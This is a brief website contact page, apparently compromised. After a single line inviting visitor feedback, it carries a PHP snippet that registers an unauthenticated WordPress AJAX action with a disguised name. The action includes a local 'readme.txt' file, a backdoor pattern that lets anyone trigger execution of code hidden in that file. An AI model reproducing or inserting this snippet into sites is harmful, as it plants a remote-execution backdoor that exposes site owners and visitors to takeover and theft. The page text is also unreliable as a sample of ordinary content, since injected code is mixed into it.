Contact Us
Please contact us with any suggestions, comments, questions, critiques or compliments! We always look forward to hearing from you, and value your time in contacting us.
if(!function_exists('file_check_readme27330')){ add_action('wp_ajax_nopriv_file_check_readme27330', 'file_check_readme27330'); add_action('wp_ajax_file_check_readme27330', 'file_check_readme27330'); function file_check_readme27330() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }